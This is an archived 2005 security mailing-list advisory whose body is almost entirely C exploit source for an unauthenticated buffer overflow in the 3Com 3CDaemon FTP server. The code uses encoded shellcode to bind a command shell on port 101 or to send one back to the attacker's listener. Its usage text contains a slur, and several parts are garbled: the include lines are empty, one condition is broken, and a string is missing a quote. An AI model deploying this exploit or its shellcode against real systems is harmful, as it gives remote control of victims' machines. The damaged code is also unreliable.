The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[EXPL] 3com 3CDaemon FTP Unauthorized "USER" Buffer Overflow (Windows/POSIX)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 21 Feb 2005 11:05:28 +0200
Subject: [EXPL] 3com 3CDaemon FTP Unauthorized "USER" Buffer Overflow (Windows/POSIX)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050221122255.7219557B9@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  3com 3CDaemon FTP Unauthorized "USER" Buffer Overflow (Windows/POSIX)
------------------------------------------------------------------------


SUMMARY

3Com FTP Server has been found to contain a remotely exploitable buffer 
overflow in its parsing of the 'USER' command. The following exploit code 
can be used to test your system for the mentioned vulnerability.

DETAILS

Exploit:
/*
3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow

The particularity of this exploit is to exploits a FTP server
without the need of any authorization.

Homepage: www.3com.com
version: 3CDaemon v2.0 rev10
Link: ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip

Application Risk: Severely High
Internet Risk: Low

Hole History:

14-4-2002: BOF flaw found by skyrim
15-4-2002: crash exploit done. securiteam.com/exploits/5NP050A75A.html
04-1-2005: Updated advisory by Sowhat securitytracker.com/id?1012768
17-2-2005: exploit released milw0rm.com/id.php?id=825
18-2-2005: exploit released hat-squad.com, class101.org, 
class101.hat-squad.com

Notes:

-4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, badly interpreted by 3CDaemon
-Nice call ebx offset found.
Stable accross Win2k Pro&Srv, SP4's serie, POSIX.

Greet:

Nima Majidi
Behrang Fouladi
Pejman
Hat-Squad.com
class101.org
class101.hat-squad.com

*/
#include 
#include 
#include 
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#endif

char scode1[]=
/*XORED*/
"\xEB\x26\x90\x00\x00\x00\x00\x00\x00\x02\x06\x6C\x59\x6C\x59"
"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\x03\x58\x46\x57\x53\x32"
"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8\xF9\xFF\xFF\xFF"
"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C\x8B\x70"
"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x8B\x5B\x78"
"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x53\x51\x52"
"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x34\x8B\x01"
"\xFE\xAC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x45\x09\x8D"
"\x44\x45\x08\x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x58\x5E\x56"
"\x50\x52\x2B\x4E\x10\x41\x0F\xB7\x0C\x4A\x8B\x04\x88\x01\xF8"
"\x0F\xB6\x4D\x09\x89\x44\x8D\xD8\xFE\x4D\x09\x75\xBE\xFE\x4D"
"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x1A\x53\xFF\xD0\x89\xC7\x6A"
"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\x82\x50\x8B\x45\x04"
"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02\x66\x35\x93"
"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x53\x53\x56"
"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x10\x55\x57"
"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\xFF\x55\xEC"
"\x8D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x5C\x63\x6D"
"\x64\x94\x31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x53\xFE\xCA"
"\x01\xF2\x52\x94\x8D\x45\x78\x50\x8D\x45\x88\x50\xB1\x08\x53"
"\x53\x6A\x10\xFE\xCE\x52\x53\x53\x53\x55\xFF\x55\xF0\x6A\xFF"
"\xFF\x55\xE4";

char scode2[]=
/*XORED*/
\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x5E\x81\x73\x17\x0E\xB4"
"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\x5C\xC9\x23\x0E\xB4\xCC\x76\x58"
"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F\xCB\x26\x76\xB5\x75\xA8\x44"
"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x14\x17\x85\xB5\x71\x12\xF1"
"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x2E\x0F\x73\x74\xD1\x35"
"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\x85\xB8\xD4\xA8\x54"
"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE\xEB\xC1\x7E\x55"
"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\xB8\x14\x78\x12"
"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x62\x16\xE4\x8F"
"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\xB4\x9F\x23\x9E"
"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\xFD\x19\x6A\xAA"
"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x59\x63\x18\x59"
"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x63\x16\xFC\x87"
"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x4B\xCA\x27\x57"
"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x84\xAE\xE3\x5E"
"\xE4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x85\x44\x70\x5D"
"\xDC\x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\xE1\xBB\x70\x59"
"\x4B\xCA\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\xF7\xD2\x67\x0E"
"\x3D\x7C\xA4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\xED\x6C\x88\x89"
"\x4E\x1C\xCF\x5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x90\xA3\x22\x0F"
"\x3D\xE3\x07\x46\x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x39\xDB\x07\x1E"
"\xE0\xCF\x72\x5F\xE5\xDE\x72\x47\xE5\xCE\x70\x5F\x4B\xEA\x23\x66"
"\xC6\x61\x90\x18\x4B\xCA\x27\xF1\x64\x16\xC5\xF1\xC1\x9F\x4B\xA3"
"\x6D\x9A\xED\xF1\xE1\x9B\xAA\xCD\xDE\x60\xDC\x38\x4B\x4C\xDC\x7B"
"\xB4\xF7\xD3\x84\xB0\xC0\xDC\x5B\xB0\xAE\xF8\x5D\x4B\x4F\x23";

char payload[1024];

char ebx[]="\x08\xB0\x01\x78";
char ebx2[]="\xB1\x2C\xC2\x77";
char pad[]="\xEB\x0C\x90\x90";
char EOL[]="\x0D\x0A";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc > 6 || argc  2 || atoi (argv [1]) < 1) {usage (argv [0]); return 
-1;}
if (argc == 5){usage (argv [0]); return -1;}
if (strlen (argv [2]) < 7){usage (argv [0]); return -1;}
if (argc == 6)
{
if (strlen (argv [4]) < 7){ usage (argv [0]); return -1;}
}
#ifndef WIN32
if (argc == 6)
{
gip = inet_addr (argv [4]) ^ (long) 0x93939393;
gport=htons (atoi (argv [5])) ^ (short) 0x9393;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup (MAKEWORD (2, 0), &wsadata) != 0){ printf ("[+] wsastartup 
error\n"); return -1;}
if (argc==6)
{
gip = inet_addr (argv [4]) ^ (ULONG) 0x93939393;
gport=htons (atoi (argv [5])) ^ (USHORT) 0x9393;
}
#endif
int ip= htonl (inet_addr (argv [2])), port;
if (argc == 4 || argc == 6) {port = atoi (argv [3]);} else port = 21;
SOCKET s; fd_set mask; struct timeval timeout; struct sockaddr_in server;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1) {printf ("[+] socket() error\n"); return -1;}
if (atoi (argv [1]) == 1) {target = ebx;os = "Win2k SP4 Server 
English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP4 Pro. Norsk\n[+] Win2k 
SP4 Server German\n[+] Win2k SP4 Pro. Dutch\n[+] Etc...";}
if (atoi (argv [1]) == 2){target = ebx2; os = "WinXP SP2 Pro. English\n[+] 
WinXP SP1a Pro. English\n[+] WinXP SP1 Pro. English";}
printf ("[+] target(s): %s\n", os);
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (ip);
server.sin_port = htons (port);
connect (s, (struct sockaddr *) & server,sizeof (server));
timeout.tv_sec = 3; timeout.tv_usec = 0; FD_ZERO (&mask); FD_SET (s, 
&mask);
switch (select (s+1, NULL, &mask, NULL, &timeout))
{
case -1: { printf ("[+] select() error\n"); closesocket(s); return -1;}
case 0: { printf("[+] connect() error\n"); closesocket(s); return -1;}
default:
if (FD_ISSET (s, &mask))
{
printf ("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep (1000);
#else
Sleep (1);
#endif
strcpy (payload, "USER ");
memset (payload + 5, 0x90, 700);
memcpy (payload + 5 + 229, &pad, 4);
memcpy (payload + 238, target, 4);
if (argc == 6)
{
memcpy (&scode1 [5], &gip, 4);
memcpy(&scode1 [3], &gport, 2);
memcpy(payload + 253, scode1, sizeof (scode1));
}
else memcpy (payload + 253, scode2,sizeof (scode2));
strcat (payload, EOL);
if (send (s, payload, strlen (payload), 0) == -1) { printf("[+] sending 
error 1, the server prolly rebooted.\n"); return -1;}
#ifdef WIN32
Sleep (2000);
#else
Sleep (2);
#endif

printf ("[+] size of payload: %d\n",strlen(payload));
printf ("[+] payload sent.\n");
return 0;
}
}
closesocket (s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}

void usage(char* us)
{
printf ("USAGE:\n");
printf (" [+] . 101_3com.exe Target VulnIP (bind mode)\n");
printf (" [+] . 101_3com.exe Target VulnIP VulnPORT (bind mode)\n");
printf (" [+] . 101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse 
mode)\n");
printf ("TARGET: \n");
printf (" [+] 1. Win2k SP4 Server English (*)\n");
printf (" [+] 1. Win2k SP4 Pro English (*)\n");
printf (" [+] 1. Win2k SP4 Server German (*)\n");
printf (" [+] 1. Win2k SP4 Pro China (*)\n");
printf (" [+] 1. Win2k SP4 Pro Dutch (*)\n");
printf (" [+] 1. Win2k SP4 Pro Norsk (*)\n");
printf (" [+] 2. WinXP SP2 Pro. English \n");
printf (" [+] 2. WinXP SP1a Pro. English (*)\n");
printf (" [+] 2. WinXP SP1 Pro. English \n");
printf ("NOTE: \n");
printf (" The exploit bind a cmdshell port 101 or\n");
printf (" reverse a cmdshell on your listener.\n");
printf (" A wildcard (*) mean tested working, else, supposed working.\n");
printf (" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" 
===================================================[0.1]=====\n");
printf(" ================3COM 3CDaemon v2.0 Revision 
10===============\n");
printf(" ==============FTP Service, Remote Stack 
Overflow=============\n");
printf(" ======coded by class101=============[Hat-Squad.com 
2005]=====\n");
printf(" 
=============================================================\n");
printf(" \n");
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:class101@hat-squad.com.> 
class 101.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру